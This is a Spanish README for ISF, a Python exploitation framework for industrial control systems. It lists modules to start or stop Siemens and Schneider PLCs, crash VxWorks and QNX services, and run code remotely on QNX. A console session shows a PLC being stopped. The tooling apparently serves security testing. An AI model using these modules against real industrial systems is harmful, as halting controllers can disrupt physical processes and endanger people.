ISF(Industrial Control System Exploitation Framework),un framework de explotación basado en Python
ISF (Industrial Exploitation Framework) es un framework de explotación basado en Python, similar al framework de metasploit.
ISF está basado en el proyecto de código abierto routersploit.
Lee esto en otros idiomas: Inglés, 简体中文,
El uso de ISF para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de ningún uso indebido o daño causado por este programa.
| Nombre | Ruta | Descripción |
|---|
| modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Cliente Modbus-TCP |
| wdb2_client | icssploit/clients/wdb2_client.py | Cliente WdbRPC Versión 2 (Vxworks 6.x) |
| s7_client | icssploit/clients/s7_client.py | Cliente s7comm (PLC S7 300/400) |
| Nombre | Ruta | Descripción |
|---|---|---|
| s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | Arranque/parada de PLC S7-300/400 |
| s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | Arranque/parada/reinicio de PLC S7-1200 |
| vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | DoS remoto por RPC en Vxworks(CVE-2015-7599) |
| quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Arranque/parada de PLC serie Schneider Quantum 140 |
| crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | DoS del servicio TCP Inetd de QNX |
| qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | Ejecución remota de código en qconn de QNX |
| profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Configuración de IP de dispositivo Profinet DCP |
| Nombre | Ruta | Descripción |
|---|---|---|
| profinet_dcp_scan | scanners/profinet_dcp_scan.py | Escáner Profinet DCP |
| vxworks_6_scan | scanners/vxworks_6_scan.py | Escáner Vxworks 6.x |
| s7comm_scan | scanners/s7comm_scan.py | Escáner S7comm |
| enip_scan | scanners/enip_scan.py | Escáner EthernetIP |
Estos protocolos se pueden usar en otros frameworks de fuzzing como Kitty o para crear su propio cliente.
| Nombre | Ruta | Descripción |
|---|---|---|
| pn_dcp | icssploit/protocols/pn_dcp | Protocolo Profinet DCP |
| modbus_tcp | icssploit/protocols/modbus_tcp | Protocolo Modbus TCP |
| wdbrpc2 | icssploit/protocols/wdbrpc2 | Protocolo WDB RPC Versión 2 |
| s7comm | icssploit/protocols/s7comm.py | Protocolo S7comm |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ \| | / __ \_ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | \___ \\___ \| ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|_____\_____|_____/_____/|_| |______\____/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
Puede usar la tecla Tab para autocompletar.
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu <jtrkid[at]gmail.com>
References:
isf (S7-300/400 PLC Control) >